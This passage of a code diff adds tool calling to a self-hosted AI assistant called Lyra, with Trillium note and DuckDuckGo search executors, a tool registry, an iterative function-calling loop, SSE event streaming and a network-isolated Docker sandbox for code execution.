            - notes (list): List of notes with noteId, title, content, type
            - count (int): Number of notes returned
            OR
            - error (str): Error message if search failed
    """
    query = args.get("query")
    limit = args.get("limit", 5)
    # Validation
    if not query:
        return {"error": "No query provided"}
    if not TRILLIUM_TOKEN:
        return {"error": "TRILLIUM_ETAPI_TOKEN not configured in environment"}
    # Cap limit
    limit = min(max(limit, 1), 20)
    try:
        async with aiohttp.ClientSession() as session:
            async with session.get(
                f"{TRILLIUM_URL}/etapi/search-notes",
                params={"search": query, "limit": limit},
                headers={"Authorization": TRILLIUM_TOKEN}
            ) as resp:
                if resp.status == 200:
                    data = await resp.json()
                    return {
                        "notes": data,
                        "count": len(data)
                    }
                elif resp.status == 401:
                    return {"error": "Authentication failed. Check TRILLIUM_ETAPI_TOKEN"}
                else:
                    error_text = await resp.text()
                    return {"error": f"HTTP {resp.status}: {error_text}"}
    except aiohttp.ClientConnectorError:
        return {"error": f"Cannot connect to Trillium at {TRILLIUM_URL}"}
    except Exception as e:
        return {"error": f"Search failed: {str(e)}"}
 async def create_note(args: Dict) -> Dict:
    """Create a note in Trillium via ETAPI.
    Args:
        args: Dictionary containing:
            - title (str): Note title
            - content (str): Note content in markdown or HTML
            - parent_note_id (str, optional): Parent note ID to nest under
    Returns:
        dict: Creation result containing:
            - noteId (str): ID of created note
            - title (str): Title of created note
            - success (bool): True if created successfully
            OR
            - error (str): Error message if creation failed
    """
    title = args.get("title")
    content = args.get("content")
    parent_note_id = args.get("parent_note_id")
    # Validation
    if not title:
        return {"error": "No title provided"}
    if not content:
        return {"error": "No content provided"}
    if not TRILLIUM_TOKEN:
        return {"error": "TRILLIUM_ETAPI_TOKEN not configured in environment"}
    # Prepare payload
    payload = {
        "title": title,
        "content": content,
        "type": "text",
        "mime": "text/html"
    }
    if parent_note_id:
        payload["parentNoteId"] = parent_note_id
    try:
        async with aiohttp.ClientSession() as session:
            async with session.post(
                f"{TRILLIUM_URL}/etapi/create-note",
                json=payload,
                headers={"Authorization": TRILLIUM_TOKEN}
            ) as resp:
                if resp.status in [200, 201]:
                    data = await resp.json()
                    return {
                        "noteId": data.get("noteId"),
                        "title": title,
                        "success": True
                    }
                elif resp.status == 401:
                    return {"error": "Authentication failed. Check TRILLIUM_ETAPI_TOKEN"}
                else:
                    error_text = await resp.text()
                    return {"error": f"HTTP {resp.status}: {error_text}"}
    except aiohttp.ClientConnectorError:
        return {"error": f"Cannot connect to Trillium at {TRILLIUM_URL}"}
    except Exception as e:
        return {"error": f"Note creation failed: {str(e)}"}
--- a/cortex/autonomy/tools/executors/web_search.py
+++ b/cortex/autonomy/tools/executors/web_search.py
@@ -0,0 +1,55 @@
 """
 Web search executor using DuckDuckGo.
 This module provides web search capabilities without requiring API keys.
 """
 from typing import Dict
 from duckduckgo_search import DDGS
 async def search_web(args: Dict) -> Dict:
    """Search the web using DuckDuckGo.
    Args:
        args: Dictionary containing:
            - query (str): The search query
            - max_results (int, optional): Maximum results to return (default: 5, max: 10)
    Returns:
        dict: Search results containing:
            - results (list): List of search results with title, url, snippet
            - count (int): Number of results returned
            OR
            - error (str): Error message if search failed
    """
    query = args.get("query")
    max_results = args.get("max_results", 5)
    # Validation
    if not query:
        return {"error": "No query provided"}
    # Cap max_results
    max_results = min(max(max_results, 1), 10)
    try:
        # DuckDuckGo search is synchronous, but we wrap it for consistency
        with DDGS() as ddgs:
            results = []
            # Perform text search
            for result in ddgs.text(query, max_results=max_results):
                results.append({
                    "title": result.get("title", ""),
                    "url": result.get("href", ""),
                    "snippet": result.get("body", "")
                })
            return {
                "results": results,
                "count": len(results)
            }
    except Exception as e:
        return {"error": f"Search failed: {str(e)}"}
--- a/cortex/autonomy/tools/function_caller.py
+++ b/cortex/autonomy/tools/function_caller.py
@@ -0,0 +1,235 @@
 """
 Provider-agnostic function caller with iterative tool calling loop.
 This module implements the iterative loop that allows LLMs to call tools
 multiple times until they have the information they need to answer the user.
 """
 import os
 import logging
 from typing import Dict, List, Optional
 from llm.llm_router import call_llm, TOOL_ADAPTERS, BACKENDS
 from .registry import get_registry
 from .stream_events import get_stream_manager
 logger = logging.getLogger(__name__)
 class FunctionCaller:
    """Provider-agnostic iterative tool calling loop.
    This class orchestrates the back-and-forth between the LLM and tools:
    1. Call LLM with tools available
    2. If LLM requests tool calls, execute them
    3. Add results to conversation
    4. Repeat until LLM is done or max iterations reached
    """
    def __init__(self, backend: str, temperature: float = 0.7):
        """Initialize function caller.
        Args:
            backend: LLM backend to use ("OPENAI", "OLLAMA", etc.)
            temperature: Temperature for LLM calls
        """
        self.backend = backend
        self.temperature = temperature
        self.registry = get_registry()
        self.max_iterations = int(os.getenv("MAX_TOOL_ITERATIONS", "5"))
        # Resolve adapter for this backend
        self.adapter = self._get_adapter()
    def _get_adapter(self):
        """Get the appropriate adapter for this backend."""
        adapter = TOOL_ADAPTERS.get(self.backend)
        # For PRIMARY/SECONDARY/FALLBACK, determine adapter based on provider
        if adapter is None and self.backend in ["PRIMARY", "SECONDARY", "FALLBACK"]:
            cfg = BACKENDS.get(self.backend, {})
            provider = cfg.get("provider", "").lower()
            if provider == "openai":
                adapter = TOOL_ADAPTERS["OPENAI"]
            elif provider == "ollama":
                adapter = TOOL_ADAPTERS["OLLAMA"]
            elif provider == "mi50":
                adapter = TOOL_ADAPTERS["MI50"]
        return adapter
    async def call_with_tools(
        self,
        messages: List[Dict],
        max_tokens: int = 2048,
        session_id: Optional[str] = None
    ) -> Dict:
        """Execute LLM with iterative tool calling.
        Args:
            messages: Conversation history
            max_tokens: Maximum tokens for LLM response
            session_id: Optional session ID for streaming events
        Returns:
            dict: {
                "content": str,  # Final response
                "iterations": int,  # Number of iterations
                "tool_calls": list,  # All tool calls made
                "messages": list,  # Full conversation history
                "truncated": bool (optional)  # True if max iterations reached
            }
        """
        logger.info(f"🔍 FunctionCaller.call_with_tools() invoked with {len(messages)} messages")
        tools = self.registry.get_tool_definitions()
        logger.info(f"🔍 Got {len(tools or [])} tool definitions from registry")
        # Get stream manager for emitting events
        stream_manager = get_stream_manager()
        should_stream = session_id and stream_manager.has_subscribers(session_id)
        # If no tools are enabled, just call LLM directly
        if not tools:
            logger.warning("FunctionCaller invoked but no tools are enabled")
            response = await call_llm(
                messages=messages,
                backend=self.backend,
                temperature=self.temperature,
                max_tokens=max_tokens
            )
            return {
                "content": response,
                "iterations": 1,
                "tool_calls": [],
                "messages": messages + [{"role": "assistant", "content": response}]
            }
        conversation = messages.copy()
        all_tool_calls = []
        for iteration in range(self.max_iterations):
            logger.info(f"Tool calling iteration {iteration + 1}/{self.max_iterations}")
            # Emit thinking event
            if should_stream:
                await stream_manager.emit(session_id, "thinking", {
                    "message": f"🤔 Thinking... (iteration {iteration + 1}/{self.max_iterations})"
                })
            # Call LLM with tools
            try:
                response = await call_llm(
                    messages=conversation,
                    backend=self.backend,
                    temperature=self.temperature,
                    max_tokens=max_tokens,
                    tools=tools,
                    tool_choice="auto",
                    return_adapter_response=True
                )
            except Exception as e:
                logger.error(f"LLM call failed: {str(e)}")
                if should_stream:
                    await stream_manager.emit(session_id, "error", {
                        "message": f"❌ Error: {str(e)}"
                    })
                return {
                    "content": f"Error calling LLM: {str(e)}",
                    "iterations": iteration + 1,
                    "tool_calls": all_tool_calls,
                    "messages": conversation,
                    "error": True
                }
            # Add assistant message to conversation
            if response.get("content"):
                conversation.append({
                    "role": "assistant",
                    "content": response["content"]
                })
            # Check for tool calls
            tool_calls = response.get("tool_calls")
            logger.debug(f"Response from LLM: content_length={len(response.get('content', ''))}, tool_calls={tool_calls}")
            if not tool_calls:
                # No more tool calls - LLM is done
                logger.info(f"Tool calling complete after {iteration + 1} iterations")
                if should_stream:
                    await stream_manager.emit(session_id, "done", {
                        "message": "✅ Complete!",
                        "final_answer": response["content"]
                    })
                return {
                    "content": response["content"],
                    "iterations": iteration + 1,
                    "tool_calls": all_tool_calls,
                    "messages": conversation
                }
            # Execute each tool call
            logger.info(f"Executing {len(tool_calls)} tool call(s)")
            for tool_call in tool_calls:
                all_tool_calls.append(tool_call)
                tool_name = tool_call.get("name")
                tool_args = tool_call.get("arguments", {})
                tool_id = tool_call.get("id", "unknown")
                logger.info(f"Calling tool: {tool_name} with args: {tool_args}")
                # Emit tool call event
                if should_stream:
                    await stream_manager.emit(session_id, "tool_call", {
                        "tool": tool_name,
                        "args": tool_args,
                        "message": f"🔧 Using tool: {tool_name}"
                    })
                try:
                    # Execute tool
                    result = await self.registry.execute_tool(tool_name, tool_args)
                    logger.info(f"Tool {tool_name} executed successfully")
                    # Emit tool result event
                    if should_stream:
                        # Format result preview
                        result_preview = str(result)
                        if len(result_preview) > 200:
                            result_preview = result_preview[:200] + "..."
                        await stream_manager.emit(session_id, "tool_result", {
                            "tool": tool_name,
                            "result": result,
                            "message": f"📊 Result: {result_preview}"
                        })
                except Exception as e:
                    logger.error(f"Tool {tool_name} execution failed: {str(e)}")
                    result = {"error": f"Tool execution failed: {str(e)}"}
                # Format result using adapter
                if not self.adapter:
                    logger.warning(f"No adapter available for backend {self.backend}, using fallback format")
                    result_msg = {
                        "role": "user",
                        "content": f"Tool {tool_name} result: {result}"
                    }
                else:
                    result_msg = self.adapter.format_tool_result(
                        tool_id,
                        tool_name,
                        result
                    )
                conversation.append(result_msg)
        # Max iterations reached without completion
        logger.warning(f"Tool calling truncated after {self.max_iterations} iterations")
        return {
            "content": response.get("content", ""),
            "iterations": self.max_iterations,
            "tool_calls": all_tool_calls,
            "messages": conversation,
            "truncated": True
        }
--- a/cortex/autonomy/tools/registry.py
+++ b/cortex/autonomy/tools/registry.py
@@ -0,0 +1,196 @@
 """
 Provider-agnostic Tool Registry for Lyra.
 This module provides a central registry for all available tools with
 Lyra-native definitions (not provider-specific).
 """
 import os
 from typing import Dict, List, Optional
 from .executors import execute_code, search_web, search_notes, create_note
 class ToolRegistry:
    """Registry for managing available tools and their definitions.
    Tools are defined in Lyra's own format (provider-agnostic), and
    adapters convert them to provider-specific formats (OpenAI function
    calling, Ollama XML prompts, etc.).
    """
    def __init__(self):
        """Initialize the tool registry with feature flags from environment."""
        self.tools = {}
        self.executors = {}
        # Feature flags from environment
        self.code_execution_enabled = os.getenv("ENABLE_CODE_EXECUTION", "true").lower() == "true"
        self.web_search_enabled = os.getenv("ENABLE_WEB_SEARCH", "true").lower() == "true"
        self.trillium_enabled = os.getenv("ENABLE_TRILLIUM", "false").lower() == "true"
        self._register_tools()
        self._register_executors()
    def _register_executors(self):
        """Register executor functions for each tool."""
        if self.code_execution_enabled:
            self.executors["execute_code"] = execute_code
        if self.web_search_enabled:
            self.executors["search_web"] = search_web
        if self.trillium_enabled:
            self.executors["search_notes"] = search_notes
            self.executors["create_note"] = create_note
    def _register_tools(self):
        """Register all available tools based on feature flags."""
        if self.code_execution_enabled:
            self.tools["execute_code"] = {
                "name": "execute_code",
                "description": "Execute Python or bash code in a secure sandbox environment. Use this to perform calculations, data processing, file operations, or any programmatic tasks. The sandbox is persistent across calls within a session and has common Python packages (numpy, pandas, requests, matplotlib, scipy) pre-installed.",
                "parameters": {
                    "language": {
                        "type": "string",
                        "enum": ["python", "bash"],
                        "description": "The programming language to execute (python or bash)"
                    },
                    "code": {
                        "type": "string",
                        "description": "The code to execute. For multi-line code, use proper indentation. For Python, use standard Python 3.11 syntax."
                    },
                    "reason": {
                        "type": "string",
                        "description": "Brief explanation of why you're executing this code and what you expect to achieve"
                    }
                },
                "required": ["language", "code", "reason"]
            }
        if self.web_search_enabled:
            self.tools["search_web"] = {
                "name": "search_web",
                "description": "Search the internet using DuckDuckGo to find current information, facts, news, or answers to questions. Returns a list of search results with titles, snippets, and URLs. Use this when you need up-to-date information or facts not in your training data.",
                "parameters": {
                    "query": {
                        "type": "string",
                        "description": "The search query to look up on the internet"
                    },
                    "max_results": {
                        "type": "integer",
                        "description": "Maximum number of results to return (default: 5, max: 10)"
                    }
                },
                "required": ["query"]
            }
        if self.trillium_enabled:
            self.tools["search_notes"] = {
                "name": "search_notes",
                "description": "Search through Trillium notes to find relevant information. Use this to retrieve knowledge, context, or information previously stored in the user's notes.",
                "parameters": {
                    "query": {
                        "type": "string",
                        "description": "The search query to find matching notes"
                    },
                    "limit": {
                        "type": "integer",
                        "description": "Maximum number of notes to return (default: 5, max: 20)"
                    }
                },
                "required": ["query"]
            }
            self.tools["create_note"] = {
                "name": "create_note",
                "description": "Create a new note in Trillium. Use this to store important information, insights, or knowledge for future reference. Notes are stored in the user's Trillium knowledge base.",
                "parameters": {
                    "title": {
                        "type": "string",
                        "description": "The title of the note"
                    },
                    "content": {
                        "type": "string",
                        "description": "The content of the note in markdown or HTML format"
                    },
                    "parent_note_id": {
                        "type": "string",
                        "description": "Optional ID of the parent note to nest this note under"
                    }
                },
                "required": ["title", "content"]
            }
    def get_tool_definitions(self) -> Optional[List[Dict]]:
        """Get list of all enabled tool definitions in Lyra format.
        Returns:
            list: List of tool definition dicts, or None if no tools enabled
        """
        if not self.tools:
            return None
        return list(self.tools.values())
    def get_tool_names(self) -> List[str]:
        """Get list of all enabled tool names.
        Returns:
            list: List of tool name strings
        """
        return list(self.tools.keys())
    def is_tool_enabled(self, tool_name: str) -> bool:
        """Check if a specific tool is enabled.
        Args:
            tool_name: Name of the tool to check
        Returns:
            bool: True if tool is enabled, False otherwise
        """
        return tool_name in self.tools
    def register_executor(self, tool_name: str, executor_func):
        """Register an executor function for a tool.
        Args:
            tool_name: Name of the tool
            executor_func: Async function that executes the tool
        """
        self.executors[tool_name] = executor_func
    async def execute_tool(self, name: str, arguments: dict) -> dict:
        """Execute a tool by name.
        Args:
            name: Tool name
            arguments: Tool arguments dict
        Returns:
            dict: Tool execution result
        """
        if name not in self.executors:
            return {"error": f"Unknown tool: {name}"}
        executor = self.executors[name]
        try:
            return await executor(arguments)
        except Exception as e:
            return {"error": f"Tool execution failed: {str(e)}"}
 # Global registry instance (singleton pattern)
 _registry = None
 def get_registry() -> ToolRegistry:
    """Get the global ToolRegistry instance.
    Returns:
        ToolRegistry: The global registry instance
    """
    global _registry
    if _registry is None:
        _registry = ToolRegistry()
    return _registry
--- a/cortex/autonomy/tools/stream_events.py
+++ b/cortex/autonomy/tools/stream_events.py
@@ -0,0 +1,91 @@
 """
 Event streaming for tool calling "show your work" feature.
 This module manages Server-Sent Events (SSE) for broadcasting the internal
 thinking process during tool calling operations.
 """
 import asyncio
 from typing import Dict, Optional
 from collections import defaultdict
 import json
 import logging
 logger = logging.getLogger(__name__)
 class ToolStreamManager:
    """Manages SSE streams for tool calling events."""
    def __init__(self):
        # session_id -> list of queues (one per connected client)
        self._subscribers: Dict[str, list] = defaultdict(list)
    def subscribe(self, session_id: str) -> asyncio.Queue:
        """Subscribe to events for a session.
        Returns:
            Queue that will receive events for this session
        """
        queue = asyncio.Queue()
        self._subscribers[session_id].append(queue)
        logger.info(f"New subscriber for session {session_id}, total: {len(self._subscribers[session_id])}")
        return queue
    def unsubscribe(self, session_id: str, queue: asyncio.Queue):
        """Unsubscribe from events for a session."""
        if session_id in self._subscribers:
            try:
                self._subscribers[session_id].remove(queue)
                logger.info(f"Removed subscriber for session {session_id}, remaining: {len(self._subscribers[session_id])}")
                # Clean up empty lists
                if not self._subscribers[session_id]:
                    del self._subscribers[session_id]
            except ValueError:
                pass
    async def emit(self, session_id: str, event_type: str, data: dict):
        """Emit an event to all subscribers of a session.
        Args:
            session_id: Session to emit to
            event_type: Type of event (thinking, tool_call, tool_result, done)
            data: Event data
        """
        if session_id not in self._subscribers:
            return
        event = {
            "type": event_type,
            "data": data
        }
        # Send to all subscribers
        dead_queues = []
        for queue in self._subscribers[session_id]:
            try:
                await queue.put(event)
            except Exception as e:
                logger.error(f"Failed to emit event to queue: {e}")
                dead_queues.append(queue)
        # Clean up dead queues
        for queue in dead_queues:
            self.unsubscribe(session_id, queue)
    def has_subscribers(self, session_id: str) -> bool:
        """Check if a session has any active subscribers."""
        return session_id in self._subscribers and len(self._subscribers[session_id]) > 0
 # Global stream manager instance
 _stream_manager: Optional[ToolStreamManager] = None
 def get_stream_manager() -> ToolStreamManager:
    """Get the global stream manager instance."""
    global _stream_manager
    if _stream_manager is None:
        _stream_manager = ToolStreamManager()
    return _stream_manager
--- a/cortex/llm/llm_router.py
+++ b/cortex/llm/llm_router.py
@@ -3,6 +3,8 @@ import os
 import httpx
 import json
 import logging
 from typing import Optional, List, Dict
 from autonomy.tools.adapters import OpenAIAdapter, OllamaAdapter, LlamaCppAdapter
 logger = logging.getLogger(__name__)
@@ -39,6 +41,16 @@ DEFAULT_BACKEND = "PRIMARY"
 # Reusable async HTTP client
 http_client = httpx.AsyncClient(timeout=120.0)
 # Tool adapters for each backend
 TOOL_ADAPTERS = {
    "OPENAI": OpenAIAdapter(),
    "OLLAMA": OllamaAdapter(),
    "MI50": LlamaCppAdapter(),  # MI50 uses llama.cpp
    "PRIMARY": None,  # Determined at runtime
    "SECONDARY": None,  # Determined at runtime
    "FALLBACK": None,  # Determined at runtime
 }
 # ------------------------------------------------------------
 # Public call
@@ -49,9 +61,12 @@ async def call_llm(
    backend: str | None = None,
    temperature: float = 0.7,
    max_tokens: int = 512,
    tools: Optional[List[Dict]] = None,
    tool_choice: Optional[str] = None,
    return_adapter_response: bool = False,
 ):
    """
-    Call an LLM backend.
+    Call an LLM backend with optional tool calling support.
    Args:
        prompt: String prompt (for completion-style APIs like mi50)
@@ -59,6 +74,13 @@ async def call_llm(
        backend: Which backend to use (PRIMARY, SECONDARY, OPENAI, etc.)
        temperature: Sampling temperature
        max_tokens: Maximum tokens to generate
        tools: List of Lyra tool definitions (provider-agnostic)
        tool_choice: How to use tools ("auto", "required", "none")
        return_adapter_response: If True, return dict with content and tool_calls
    Returns:
        str (default) or dict (if return_adapter_response=True):
            {"content": str, "tool_calls": [...] or None}
    """
    backend = (backend or DEFAULT_BACKEND).upper()
@@ -73,10 +95,54 @@ async def call_llm(
    if not url or not model:
        raise RuntimeError(f"Backend '{backend}' missing url/model in env")
    # If tools are requested, use adapter to prepare request
    if tools:
        # Get adapter for this backend
        adapter = TOOL_ADAPTERS.get(backend)
        # For PRIMARY/SECONDARY/FALLBACK, determine adapter based on provider
        if adapter is None and backend in ["PRIMARY", "SECONDARY", "FALLBACK"]:
            if provider == "openai":
                adapter = TOOL_ADAPTERS["OPENAI"]
            elif provider == "ollama":
                adapter = TOOL_ADAPTERS["OLLAMA"]
            elif provider == "mi50":
                adapter = TOOL_ADAPTERS["MI50"]
        if adapter:
            # Use messages array if provided, otherwise convert prompt to messages
            if not messages:
                messages = [{"role": "user", "content": prompt}]
            # Prepare request through adapter
            adapted_request = await adapter.prepare_request(messages, tools, tool_choice)
            messages = adapted_request["messages"]
            # Extract tools in provider format if present
            provider_tools = adapted_request.get("tools")
            provider_tool_choice = adapted_request.get("tool_choice")
        else:
            logger.warning(f"No adapter available for backend {backend}, ignoring tools")
            provider_tools = None
            provider_tool_choice = None
    else:
        provider_tools = None
        provider_tool_choice = None
    # -------------------------------
    # Provider: MI50 (llama.cpp server)
    # -------------------------------
    if provider == "mi50":
        # If tools requested, convert messages to prompt with tool instructions
        if messages and tools:
            # Combine messages into a prompt
            prompt_parts = []
            for msg in messages:
                role = msg.get("role", "user")
                content = msg.get("content", "")
                prompt_parts.append(f"{role.capitalize()}: {content}")
            prompt = "\n".join(prompt_parts) + "\nAssistant:"
        payload = {
            "prompt": prompt,
            "n_predict": max_tokens,
@@ -87,7 +153,15 @@ async def call_llm(
            r = await http_client.post(f"{url}/completion", json=payload)
            r.raise_for_status()
            data = r.json()
-            return data.get("content", "")
+            response_content = data.get("content", "")
            # If caller wants adapter response with tool calls, parse and return
            if return_adapter_response and tools:
                adapter = TOOL_ADAPTERS.get(backend) or TOOL_ADAPTERS["MI50"]
                return await adapter.parse_response(response_content)
            else:
                return response_content
        except httpx.HTTPError as e:
            logger.error(f"HTTP error calling mi50: {type(e).__name__}: {str(e)}")
            raise RuntimeError(f"LLM API error (mi50): {type(e).__name__}: {str(e)}")
@@ -101,7 +175,9 @@ async def call_llm(
    # -------------------------------
    # Provider: OLLAMA (your 3090)
    # -------------------------------
    logger.info(f"🔍 LLM Router: provider={provider}, checking if ollama...")
    if provider == "ollama":
        logger.info(f"🔍 LLM Router: Matched ollama provider, tools={bool(tools)}, return_adapter_response={return_adapter_response}")
        # Use messages array if provided, otherwise convert prompt to single user message
        if messages:
            chat_messages = messages
@@ -121,7 +197,19 @@ async def call_llm(
            r = await http_client.post(f"{url}/api/chat", json=payload)
            r.raise_for_status()
            data = r.json()
-            return data["message"]["content"]
+            response_content = data["message"]["content"]
            # If caller wants adapter response with tool calls, parse and return
            if return_adapter_response and tools:
                logger.info(f"🔍 Ollama: return_adapter_response=True, calling adapter.parse_response")
                adapter = TOOL_ADAPTERS.get(backend) or TOOL_ADAPTERS["OLLAMA"]
                logger.info(f"🔍 Ollama: Using adapter {adapter.__class__.__name__}")
                result = await adapter.parse_response(response_content)
                logger.info(f"🔍 Ollama: Adapter returned {result}")
                return result
            else:
                return response_content
        except httpx.HTTPError as e:
            logger.error(f"HTTP error calling ollama: {type(e).__name__}: {str(e)}")
            raise RuntimeError(f"LLM API error (ollama): {type(e).__name__}: {str(e)}")
@@ -154,11 +242,49 @@ async def call_llm(
            "temperature": temperature,
            "max_tokens": max_tokens,
        }
        # Add tools if available (OpenAI native function calling)
        if provider_tools:
            payload["tools"] = provider_tools
            if provider_tool_choice:
                payload["tool_choice"] = provider_tool_choice
        try:
            r = await http_client.post(f"{url}/chat/completions", json=payload, headers=headers)
            r.raise_for_status()
            data = r.json()
            # If caller wants adapter response with tool calls, parse and return
            if return_adapter_response and tools:
                # Create mock response object for adapter
                class MockChoice:
                    def __init__(self, message_data):
                        self.message = type('obj', (object,), {})()
                        self.message.content = message_data.get("content")
                        # Convert tool_calls dicts to objects
                        raw_tool_calls = message_data.get("tool_calls")
                        if raw_tool_calls:
                            self.message.tool_calls = []
                            for tc in raw_tool_calls:
                                tool_call_obj = type('obj', (object,), {})()
                                tool_call_obj.id = tc.get("id")
                                tool_call_obj.function = type('obj', (object,), {})()
                                tool_call_obj.function.name = tc.get("function", {}).get("name")
                                tool_call_obj.function.arguments = tc.get("function", {}).get("arguments")
                                self.message.tool_calls.append(tool_call_obj)
                        else:
                            self.message.tool_calls = None
                class MockResponse:
                    def __init__(self, data):
                        self.choices = [MockChoice(data["choices"][0]["message"])]
                mock_resp = MockResponse(data)
                adapter = TOOL_ADAPTERS.get(backend) or TOOL_ADAPTERS["OPENAI"]
                return await adapter.parse_response(mock_resp)
            else:
                return data["choices"][0]["message"]["content"]
        except httpx.HTTPError as e:
            logger.error(f"HTTP error calling openai: {type(e).__name__}: {str(e)}")
            raise RuntimeError(f"LLM API error (openai): {type(e).__name__}: {str(e)}")
--- a/cortex/main.py
+++ b/cortex/main.py
@@ -1,6 +1,16 @@
 from fastapi import FastAPI
 from fastapi.middleware.cors import CORSMiddleware
 from router import cortex_router
 app = FastAPI()
 # Add CORS middleware to allow SSE connections from nginx UI
 app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],  # In production, specify exact origins
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
 )
 app.include_router(cortex_router)
--- a/cortex/requirements.txt
+++ b/cortex/requirements.txt
@@ -4,3 +4,5 @@ python-dotenv==1.0.1
 requests==2.32.3
 httpx==0.27.2
 pydantic==2.10.4
 duckduckgo-search==6.3.5
 aiohttp==3.9.1
--- a/cortex/router.py
+++ b/cortex/router.py
@@ -2,7 +2,9 @@
 import os
 import logging
 import asyncio
 from fastapi import APIRouter
 from fastapi.responses import StreamingResponse
 from pydantic import BaseModel
 from reasoning.reasoning import reason_check
@@ -15,6 +17,7 @@ from intake.intake import add_exchange_internal
 from autonomy.monologue.monologue import InnerMonologue
 from autonomy.self.state import load_self_state
 from autonomy.tools.stream_events import get_stream_manager
 # -------------------------------------------------------------------
@@ -343,6 +346,7 @@ async def run_simple(req: ReasonRequest):
    """
    from datetime import datetime
    from llm.llm_router import call_llm
    from autonomy.tools.function_caller import FunctionCaller
    start_time = datetime.now()
@@ -396,16 +400,38 @@ async def run_simple(req: ReasonRequest):
    temperature = req.temperature if req.temperature is not None else 0.7
-    # Direct LLM call with messages (works for Ollama/OpenAI chat APIs)
+    # Check if tools are enabled
    enable_tools = os.getenv("STANDARD_MODE_ENABLE_TOOLS", "false").lower() == "true"
    # Call LLM with or without tools
    try:
        if enable_tools:
            # Use FunctionCaller for tool-enabled conversation
            logger.info(f"🛠️  Tool calling enabled for Standard Mode")
            logger.info(f"🔍 Creating FunctionCaller with backend={backend}, temp={temperature}")
            function_caller = FunctionCaller(backend, temperature)
            logger.info(f"🔍 FunctionCaller created, calling call_with_tools...")
            result = await function_caller.call_with_tools(
                messages=messages,
                max_tokens=2048,
                session_id=req.session_id  # Pass session_id for streaming
            )
            logger.info(f"🔍 call_with_tools returned: iterations={result.get('iterations')}, tool_calls={len(result.get('tool_calls', []))}")
            # Log tool usage
            if result.get("tool_calls"):
                tool_names = [tc["name"] for tc in result["tool_calls"]]
                logger.info(f"🔧 Tools used: {', '.join(tool_names)} ({result['iterations']} iterations)")
            response = result["content"].strip()
        else:
            # Direct LLM call without tools (original behavior)
            raw_response = await call_llm(
                messages=messages,
                backend=backend,
                temperature=temperature,
                max_tokens=2048
            )
        # Clean response - just strip whitespace
            response = raw_response.strip()
    except Exception as e:
@@ -448,6 +474,63 @@ async def run_simple(req: ReasonRequest):
    }
 # -------------------------------------------------------------------
 # /stream/thinking endpoint - SSE stream for "show your work"
 # -------------------------------------------------------------------
@cortex_router.get("/stream/thinking/{session_id}")
 async def stream_thinking(session_id: str):
    """
    Server-Sent Events stream for tool calling "show your work" feature.
    Streams real-time updates about:
    - Thinking/planning steps
    - Tool calls being made
    - Tool execution results
    - Final completion
    """
    stream_manager = get_stream_manager()
    queue = stream_manager.subscribe(session_id)
    async def event_generator():
        try:
            # Send initial connection message
            import json
            connected_event = json.dumps({"type": "connected", "session_id": session_id})
            yield f"data: {connected_event}\n\n"
            while True:
                # Wait for events with timeout to send keepalive
                try:
                    event = await asyncio.wait_for(queue.get(), timeout=30.0)
                    # Format as SSE
                    event_data = json.dumps(event)
                    yield f"data: {event_data}\n\n"
                    # If it's a "done" event, close the stream
                    if event.get("type") == "done":
                        break
                except asyncio.TimeoutError:
                    # Send keepalive comment
                    yield ": keepalive\n\n"
        except asyncio.CancelledError:
            logger.info(f"Stream cancelled for session {session_id}")
        finally:
            stream_manager.unsubscribe(session_id, queue)
    return StreamingResponse(
        event_generator(),
        media_type="text/event-stream",
        headers={
            "Cache-Control": "no-cache",
            "Connection": "keep-alive",
            "X-Accel-Buffering": "no"  # Disable nginx buffering
        }
    )
 # -------------------------------------------------------------------
 # /ingest endpoint (internal)
 # -------------------------------------------------------------------
--- a/debug_regex.py
+++ b/debug_regex.py
@@ -0,0 +1,26 @@
 #!/usr/bin/env python3
 import re
 xml = """<tool_call>
  <name>execute_code</name>
  <arguments>
    <language>python</language>
    <code>print(50 / 2)</code>
    <reason>To calculate the result of dividing 50 by 2.</reason>
  </arguments>
 </olith>"""
 pattern = r'<tool_call>(.*?)</(?:tool_call|[a-zA-Z]+)>'
 matches = re.findall(pattern, xml, re.DOTALL)
 print(f"Pattern: {pattern}")
 print(f"Number of matches: {len(matches)}")
 print("\nMatches:")
 for idx, match in enumerate(matches):
    print(f"\nMatch {idx + 1}:")
    print(f"Length: {len(match)} chars")
    print(f"Content:\n{match[:200]}")
 # Now test what gets removed
 clean_content = re.sub(pattern, '', xml, flags=re.DOTALL).strip()
 print(f"\n\nCleaned content:\n{clean_content}")
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -7,6 +7,8 @@ volumes:
    driver: local
  neo4j_data:
    driver: local
  code_executions:
    driver: local
 services:
@@ -125,11 +127,37 @@ services:
      - ./.env
    volumes:
      - ./cortex:/app
      - /var/run/docker.sock:/var/run/docker.sock:ro
    ports:
      - "7081:7081"
    networks:
      - lyra_net
  # ============================================================
  # Code Sandbox (for tool execution)
  # ============================================================
  code-sandbox:
    build:
      context: ./sandbox
    container_name: lyra-code-sandbox
    restart: unless-stopped
    security_opt:
      - no-new-privileges:true
    cap_drop:
      - ALL
    cap_add:
      - CHOWN
      - SETUID
      - SETGID
    network_mode: "none"
    volumes:
      - code_executions:/executions
    mem_limit: 512m
    cpus: 1.0
    pids_limit: 100
    user: sandbox
    command: tail -f /dev/null
  # ============================================================
  # Intake
  # ============================================================
--- a/sandbox/Dockerfile
+++ b/sandbox/Dockerfile
@@ -0,0 +1,30 @@
 FROM python:3.11-slim
 # Install runtime dependencies
 RUN apt-get update && apt-get install -y \
    bash \
    coreutils \
    && rm -rf /var/lib/apt/lists/*
 # Install common Python packages for data analysis and computation
 RUN pip install --no-cache-dir \
    numpy \
    pandas \
    requests \
    matplotlib \
    scipy
 # Create non-root user for security
 RUN useradd -m -u 1000 sandbox
 # Create execution directory
 RUN mkdir /executions && chown sandbox:sandbox /executions
 # Switch to non-root user
 USER sandbox
 # Set working directory
 WORKDIR /executions
 # Keep container running
 CMD ["tail", "-f", "/dev/null"]
--- a/test_ollama_parser.py
+++ b/test_ollama_parser.py
@@ -0,0 +1,103 @@
 #!/usr/bin/env python3
 """
 Test OllamaAdapter XML parsing with real malformed examples.
 """
 import asyncio
 import sys
 sys.path.insert(0, '/home/serversdown/project-lyra/cortex')
 from autonomy.tools.adapters.ollama_adapter import OllamaAdapter
 async def test_parser():
    adapter = OllamaAdapter()
    # Test cases with actual malformed XML we've seen
    test_cases = [
        {
            "name": "Malformed closing tag 1",
            "xml": """<tool_call>
  <name>execute_code</name>
  <arguments>
    <language>python</language>
